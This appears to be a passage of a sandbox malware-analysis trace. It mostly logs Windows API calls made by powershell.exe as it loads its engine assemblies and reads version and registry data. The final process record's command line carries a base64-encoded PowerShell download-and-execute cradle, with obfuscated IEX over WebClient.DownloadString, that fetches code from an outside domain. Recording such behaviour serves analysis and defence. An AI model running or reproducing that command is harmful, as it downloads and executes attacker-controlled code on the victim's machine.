	[0948.535] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x1840
	[0948.535] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x10c4
	[0948.535] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x128c
	[0948.535] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x16e8
	[0948.535] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x26dae0 | out: lpdwProcessId=0x26dae0) returned 0x16cc
	[0948.539] WerSetFlags () returned 0x0
	[0948.548] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0948.548] CoTaskMemFree (pv=0x0) 
	[0948.549] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26de48, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26de40 | out: pulNumLanguages=0x26de48, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x26de40) returned 1
	[0948.550] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x26de48, pwszLanguagesBuffer=0x2cbf538, pcchLanguagesBuffer=0x26de40 | out: pulNumLanguages=0x26de48, pwszLanguagesBuffer=0x2cbf538, pcchLanguagesBuffer=0x26de40) returned 1
	[0948.555] CoTaskMemAlloc (cb=0x24) returned 0x50ba00
	[0948.555] GetUserDefaultLocaleName (in: lpLocaleName=0x50ba00, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0948.556] CoTaskMemFree (pv=0x50ba00) 
	[0950.988] CoTaskMemAlloc (cb=0x104) returned 0x479b30
	[0950.988] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x479b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0950.988] CoTaskMemFree (pv=0x479b30) 
	[0950.990] CoTaskMemAlloc (cb=0x104) returned 0x479b30
	[0950.990] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x479b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0950.990] CoTaskMemFree (pv=0x479b30) 
	[0950.992] CoTaskMemAlloc (cb=0x104) returned 0x479b30
	[0950.992] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x479b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0950.992] CoTaskMemFree (pv=0x479b30) 
	[0951.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0951.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0951.001] SetErrorMode (uMode=0x1) returned 0x1
	[0951.001] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x26dac0 | out: lpFileInformation=0x26dac0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0951.001] SetErrorMode (uMode=0x1) returned 0x1
	[0951.001] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x26dd30 | out: lpdwHandle=0x26dd30) returned 0x94c
	[0951.002] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2cc2dc8 | out: lpData=0x2cc2dc8) returned 1
	[0951.003] VerQueryValueW (in: pBlock=0x2cc2dc8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26dca8, puLen=0x26dca0 | out: lplpBuffer=0x26dca8*=0x2cc2e64, puLen=0x26dca0) returned 1
	[0951.003] VerQueryValueW (in: pBlock=0x2cc2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x26dc18, puLen=0x26dc10 | out: lplpBuffer=0x26dc18*=0x2cc2f40, puLen=0x26dc10) returned 1
	[0951.003] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0951.003] CoTaskMemAlloc (cb=0x2e) returned 0x4d7880
	[0951.003] lstrcpyW (in: lpString1=0x4d7880, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0951.003] CoTaskMemFree (pv=0x4d7880) 
	[0951.003] VerQueryValueW (in: pBlock=0x2cc2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x26dc18, puLen=0x26dc10 | out: lplpBuffer=0x26dc18*=0x2cc2f94, puLen=0x26dc10) returned 1
	[0951.003] lstrlenW (lpString="System.Management.Automation") returned 28
	[0951.003] CoTaskMemAlloc (cb=0x3c) returned 0x485d50
	[0951.003] lstrcpyW (in: lpString1=0x485d50, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0951.003] CoTaskMemFree (pv=0x485d50) 
	[0951.003] VerQueryValueW (in: pBlock=0x2cc2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x26dc18, puLen=0x26dc10 | out: lplpBuffer=0x26dc18*=0x2cc2ff0, puLen=0x26dc10) returned 1
	[0951.003] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0951.003] CoTaskMemAlloc (cb=0x20) returned 0x50ba60
	[0951.003] lstrcpyW (in: lpString1=0x50ba60, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0951.003] CoTaskMemFree (pv=0x50ba60) 
	[0951.003] VerQueryValueW (in: pBlock=0x2cc2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x26dc18, puLen=0x26dc10 | out: lplpBuffer=0x26dc18*=0x2cc3030, puLen=0x26dc10) returned 1
	[0951.003] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0951.003] CoTaskMemAlloc (cb=0x44) returned 0x485d50
	[0951.003] lstrcpyW (in: lpString1=0x485d50, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0951.003] CoTaskMemFree (pv=0x485d50) 
	[0951.003] VerQueryValueW (in: pBlock=0x2cc2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x26dc18, puLen=0x26dc10 | out: lplpBuffer=0x26dc18*=0x2cc3098, puLen=0x26dc10) returned 1
	[0951.003] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0951.004] CoTaskMemAlloc (cb=0x76) returned 0x4aef30
	[0951.004] lstrcpyW (in: lpString1=0x4aef30, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0951.004] CoTaskMemFree (pv=0x4aef30) 
	[0951.004] VerQueryValueW (in: pBlock=0x2cc2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x26dc18, puLen=0x26dc10 | out: lplpBuffer=0x26dc18*=0x2cc3134, puLen=0x26dc10) returned 1
	[0951.004] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0951.004] CoTaskMemAlloc (cb=0x44) returned 0x485d50
	[0951.004] lstrcpyW (in: lpString1=0x485d50, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0951.004] CoTaskMemFree (pv=0x485d50) 
	[0951.004] VerQueryValueW (in: pBlock=0x2cc2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x26dc18, puLen=0x26dc10 | out: lplpBuffer=0x26dc18*=0x2cc3198, puLen=0x26dc10) returned 1
	[0951.004] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0951.004] CoTaskMemAlloc (cb=0x58) returned 0x468ee0
	[0951.004] lstrcpyW (in: lpString1=0x468ee0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0951.004] CoTaskMemFree (pv=0x468ee0) 
	[0951.004] VerQueryValueW (in: pBlock=0x2cc2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x26dc18, puLen=0x26dc10 | out: lplpBuffer=0x26dc18*=0x2cc3214, puLen=0x26dc10) returned 1
	[0951.004] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0951.004] CoTaskMemAlloc (cb=0x20) returned 0x50ba60
	[0951.004] lstrcpyW (in: lpString1=0x50ba60, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0951.004] CoTaskMemFree (pv=0x50ba60) 
	[0951.004] VerQueryValueW (in: pBlock=0x2cc2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x26dc18, puLen=0x26dc10 | out: lplpBuffer=0x26dc18*=0x2cc2ebc, puLen=0x26dc10) returned 1
	[0951.004] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0951.004] CoTaskMemAlloc (cb=0x66) returned 0x501b90
	[0951.004] lstrcpyW (in: lpString1=0x501b90, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0951.004] CoTaskMemFree (pv=0x501b90) 
	[0951.004] VerQueryValueW (in: pBlock=0x2cc2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x26dc18, puLen=0x26dc10 | out: lplpBuffer=0x26dc18*=0x0, puLen=0x26dc10) returned 0
	[0951.004] VerQueryValueW (in: pBlock=0x2cc2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x26dc18, puLen=0x26dc10 | out: lplpBuffer=0x26dc18*=0x0, puLen=0x26dc10) returned 0
	[0951.004] VerQueryValueW (in: pBlock=0x2cc2dc8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x26dc18, puLen=0x26dc10 | out: lplpBuffer=0x26dc18*=0x0, puLen=0x26dc10) returned 0
	[0951.004] VerQueryValueW (in: pBlock=0x2cc2dc8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x26dbe8, puLen=0x26dbe0 | out: lplpBuffer=0x26dbe8*=0x2cc2e64, puLen=0x26dbe0) returned 1
	[0951.004] CoTaskMemAlloc (cb=0x204) returned 0x4b74c0
	[0951.004] VerLanguageNameW (in: wLang=0x0, szLang=0x4b74c0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0951.004] CoTaskMemFree (pv=0x4b74c0) 
	[0951.004] VerQueryValueW (in: pBlock=0x2cc2dc8, lpSubBlock="\\", lplpBuffer=0x26dc38, puLen=0x26dc30 | out: lplpBuffer=0x26dc38*=0x2cc2df0, puLen=0x26dc30) returned 1
	[0953.997] CoTaskMemAlloc (cb=0x104) returned 0x479b30
	[0953.997] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x479b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0953.997] CoTaskMemFree (pv=0x479b30) 
	[0954.001] CoTaskMemAlloc (cb=0x104) returned 0x479b30
	[0954.001] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x479b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0954.001] CoTaskMemFree (pv=0x479b30) 
	[0954.004] lstrlenW (lpString="䅁") returned 1
	[0954.013] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x26db08 | out: phkResult=0x26db08*=0x2e8) returned 0x0
	[0954.015] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x26daf8 | out: phkResult=0x26daf8*=0x2ec) returned 0x0
	[0954.015] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26db88 | out: phkResult=0x26db88*=0x2f0) returned 0x0
	[0954.019] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26dacc, lpData=0x0, lpcbData=0x26dac8*=0x0 | out: lpType=0x26dacc*=0x1, lpData=0x0, lpcbData=0x26dac8*=0x56) returned 0x0
	[0954.019] CoTaskMemAlloc (cb=0x5a) returned 0x501b20
	[0954.019] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26da9c, lpData=0x501b20, lpcbData=0x26da98*=0x56 | out: lpType=0x26da9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26da98*=0x56) returned 0x0
	[0954.019] CoTaskMemFree (pv=0x501b20) 
	[0954.025] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0954.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0955.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d620, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0955.042] CoTaskMemAlloc (cb=0x104) returned 0x479b30
	[0955.042] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x479b30, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0955.042] CoTaskMemFree (pv=0x479b30) 
	[0957.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0957.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0958.678] CoTaskMemAlloc (cb=0x104) returned 0x45d1e0
	[0958.678] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x45d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0958.678] CoTaskMemFree (pv=0x45d1e0) 
	[0958.680] CoTaskMemAlloc (cb=0x104) returned 0x45d1e0
	[0958.680] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x45d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0958.680] CoTaskMemFree (pv=0x45d1e0) 
	[0959.352] CoTaskMemAlloc (cb=0x104) returned 0x45d1e0
	[0959.352] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x45d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0959.352] CoTaskMemFree (pv=0x45d1e0) 
	[0959.354] CoTaskMemAlloc (cb=0x104) returned 0x45d1e0
	[0959.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x45d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0959.354] CoTaskMemFree (pv=0x45d1e0) 
	[0959.354] CoTaskMemAlloc (cb=0x104) returned 0x45d1e0
	[0959.354] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x45d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0959.354] CoTaskMemFree (pv=0x45d1e0) 
	[0961.235] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0961.236] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0961.252] CoTaskMemAlloc (cb=0x104) returned 0x45d1e0
	[0961.252] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x45d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0961.252] CoTaskMemFree (pv=0x45d1e0) 
	[0961.254] CoTaskMemAlloc (cb=0x104) returned 0x45d1e0
	[0961.254] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x45d1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0961.255] CoTaskMemFree (pv=0x45d1e0) 
	[0961.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0961.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0963.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0963.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0967.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0967.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0968.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0968.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26d6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0968.327] CoTaskMemAlloc (cb=0x104) returned 0x4bf690
	[0968.327] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4bf690, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0968.327] CoTaskMemFree (pv=0x4bf690) 
	[0968.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0968.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0968.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0968.335] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0969.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x26d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0969.251] SetErrorMode (uMode=0x1) returned 0x1
	[0969.251] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x26da60 | out: lpFileInformation=0x26da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0969.251] SetErrorMode (uMode=0x1) returned 0x1

Thread:
	id = 709
	os_tid = 0x1608


Thread:
	id = 746
	os_tid = 0x16f4


Thread:
	id = 1472
	os_tid = 0xbf8


Thread:
	id = 1477
	os_tid = 0x1dc4


Thread:
	id = 1548
	os_tid = 0x2080


Thread:
	id = 1619
	os_tid = 0x2200


Thread:
	id = 1644
	os_tid = 0x2274

	[0829.326] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0

Thread:
	id = 1678
	os_tid = 0x2340


Process:
	id = "122"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x5f383000"
	os_pid = "0xfdc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
